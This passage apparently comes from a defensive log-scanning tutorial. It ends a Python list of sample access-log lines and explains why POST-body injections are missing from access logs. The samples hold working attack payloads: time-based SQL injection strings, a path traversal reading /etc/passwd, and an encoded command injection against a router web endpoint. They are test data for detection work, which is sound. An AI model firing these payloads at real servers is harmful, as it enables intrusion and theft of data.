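    '?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [01/Jun/2024:10:00:01 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jun/2024:10:00:02 +0800] "GET /js/player/dmplayer/dmku/'
    '?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 42 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [01/Jun/2024:10:00:03 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query'
    '?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 10 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jun/2024:10:00:04 +0800] "GET /index.php?id=42 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for raw in (SAMPLE_POST, SAMPLE_UPLOAD):
        print(inspect_request(raw))
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Access logs record only the request line, so the POST-body injections in this list (the Mura, 亿赛通 and 方正 entries, for instance) are only visible in WAF or application logs that retain bodies, and a scan of the web server log alone will miss them. A time-based hit is best corroborated against the response time recorded in the same log, since the delay is the whole point of those payloads.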